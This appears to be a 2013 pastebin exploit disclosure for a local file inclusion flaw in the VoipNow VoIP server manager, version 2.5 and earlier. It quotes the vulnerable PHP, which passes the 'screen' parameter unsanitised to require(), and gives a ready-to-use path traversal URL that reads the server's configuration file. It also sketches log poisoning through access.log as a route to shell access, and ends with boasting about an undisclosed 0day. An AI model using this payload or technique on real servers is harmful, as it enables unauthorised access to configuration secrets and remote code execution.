VoipNow <= 2.5 - Local File Inclusion Vulnerability


SUBMITTED BY: Guest

DATE: Nov. 24, 2013, 11:56 p.m.

FORMAT: Text only

SIZE: 1.1 kB

HITS: 1986

  1. /*
  2. + Application : Voipnow
  3. | Version , Perior to 2.5.0
  4. | Download : http://4psa.com/
  5. | By Faris , AKA i-Hmx
  6. | n0p1337@gmail.com
  7. + sec4ever.com , 1337s.cc
  8. */
  9. VoipNow is commercial web GUI voip server manager,
  10. it's affected by local file inclusion vuln
  11. File : /usr/local/voipnow/admin/htdocs/help/index.php
  12. Line 832
  13. if ( !( isset( $_GET['screen'] ) && trim( $_GET['screen'] ) != "" ) )
  14. {
  15. exit( );
  16. }
  17. Line 872
  18. require( $help_path.trim( $_GET['screen'] ) );
  19. Example : https://target/help/index.php?screen=../../../../../../../../etc/voipnow/voipnow.conf
  20. can be exploited to gain shell access to the server via infecting Logs which located at
  21. /usr/local/voipnow/admin/logs/access.log
  22. NP : Sorry Guys for the time you wasted tracing my Elastix Logs ;)
  23. But The 0day Remain 0day till i decide to dislose it by my own xD
  24. and again Enjoy the song : http://www.youtube.com/watch?v=d-ELnDPmI8w
  25. keep in Your skiddy minds , "I Ain't Mad At Cha"
  26. < Faris , The Awsome xD >

comments powered by Disqus